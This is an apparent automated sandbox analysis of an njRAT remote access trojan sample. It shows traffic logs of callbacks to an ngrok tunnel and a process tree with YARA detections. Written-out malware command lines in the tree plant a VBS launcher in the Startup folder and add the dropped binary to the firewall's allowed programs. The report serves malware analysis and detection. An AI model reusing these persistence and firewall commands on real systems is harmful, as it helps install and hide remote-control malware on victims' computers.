                                                                      Feb 5, 2024 17:12:40.216027975 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:40.522742987 CET19208497193.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:40.522810936 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:42.069120884 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:42.375828028 CET19208497193.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:46.231547117 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:46.541541100 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:46.541742086 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:46.853147030 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:46.853238106 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:47.573414087 CET4972019208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:47.883291006 CET19208497203.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:49.592650890 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:49.902971983 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:49.903121948 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:50.213625908 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:50.213757992 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:50.977611065 CET4972119208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:51.287813902 CET19208497213.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.048609972 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:53.358397007 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.358488083 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:53.668397903 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:53.668493032 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:55.034301043 CET4972219208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:55.344258070 CET19208497223.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.146511078 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:57.458035946 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.458201885 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:12:57.769925117 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:12:57.769987106 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:00.449419022 CET4972319208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:00.761018991 CET19208497233.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:03.844918013 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:04.157108068 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:04.157234907 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:04.469436884 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:04.469506025 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:13.604278088 CET4972419208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:13.916524887 CET19208497243.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:22.860435009 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:23.174705982 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:23.174871922 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:23.493720055 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:13:23.496716976 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:59.558134079 CET4972519208192.168.2.113.6.98.232
                                                                      Feb 5, 2024 17:13:59.872311115 CET19208497253.6.98.232192.168.2.11
                                                                      Feb 5, 2024 17:14:01.907668114 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:02.214173079 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:02.218672037 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:02.525474072 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:02.525549889 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:07.579174042 CET4972619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:07.885520935 CET19208497263.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:19.738795996 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:20.047842979 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:20.047951937 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:14:20.355074883 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:14:20.355150938 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:15:07.884924889 CET4972719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:15:08.192624092 CET19208497273.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:15:11.579549074 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:11.892786980 CET19208497283.6.115.182192.168.2.11
                                                                      Feb 5, 2024 17:15:11.892965078 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:12.207818031 CET19208497283.6.115.182192.168.2.11
                                                                      Feb 5, 2024 17:15:12.207933903 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:26.191171885 CET4972819208192.168.2.113.6.115.182
                                                                      Feb 5, 2024 17:15:26.504384041 CET19208497283.6.115.182192.168.2.11
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Feb 5, 2024 17:11:44.336168051 CET  54094  53  192.168.2.11  1.1.1.1
Feb 5, 2024 17:11:44.457189083 CET  53  54094  1.1.1.1  192.168.2.11
Feb 5, 2024 17:12:46.096275091 CET  64985  53  192.168.2.11  1.1.1.1
Feb 5, 2024 17:12:46.230243921 CET  53  64985  1.1.1.1  192.168.2.11
Feb 5, 2024 17:14:01.568389893 CET  56955  53  192.168.2.11  1.1.1.1
Feb 5, 2024 17:14:01.688663006 CET  53  56955  1.1.1.1  192.168.2.11
Feb 5, 2024 17:15:10.589945078 CET  63483  53  192.168.2.11  1.1.1.1
Feb 5, 2024 17:15:10.712907076 CET  53  63483  1.1.1.1  192.168.2.11
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Feb 5, 2024 17:11:44.336168051 CET  192.168.2.11  1.1.1.1  0x13f  Standard query (0)  0.tcp.in.ngrok.io  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:12:46.096275091 CET  192.168.2.11  1.1.1.1  0xfe04  Standard query (0)  0.tcp.in.ngrok.io  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:14:01.568389893 CET  192.168.2.11  1.1.1.1  0xe5aa  Standard query (0)  0.tcp.in.ngrok.io  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:15:10.589945078 CET  192.168.2.11  1.1.1.1  0x775a  Standard query (0)  0.tcp.in.ngrok.io  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Feb 5, 2024 17:11:44.457189083 CET  1.1.1.1  192.168.2.11  0x13f  No error (0)  0.tcp.in.ngrok.io  (none)  3.6.122.107  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:12:46.230243921 CET  1.1.1.1  192.168.2.11  0xfe04  No error (0)  0.tcp.in.ngrok.io  (none)  3.6.98.232  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:14:01.688663006 CET  1.1.1.1  192.168.2.11  0xe5aa  No error (0)  0.tcp.in.ngrok.io  (none)  3.6.122.107  A (IP address)  IN (0x0001)  false
Feb 5, 2024 17:15:10.712907076 CET  1.1.1.1  192.168.2.11  0x775a  No error (0)  0.tcp.in.ngrok.io  (none)  3.6.115.182  A (IP address)  IN (0x0001)  false

                                                                      Target ID:1
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:17:11:18
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:17:11:19
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:17:11:27
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:17:11:28
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:17:11:31
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      Imagebase:0x7ff6c3bf0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:17:11:38
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
                                                                      Imagebase:0x10d0000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:17:11:38
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                      Imagebase:0xc30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:17:11:49
                                                                      Start date:05/02/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff68cce0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:17:11:50
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:17:11:58
                                                                      Start date:05/02/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                      Imagebase:0x400000
                                                                      File size:162'146 bytes
                                                                      MD5 hash:52B074E39E4F3BA00C230BA82EB62499
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                      • Rule: njrat1, Description: Identify njRat, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
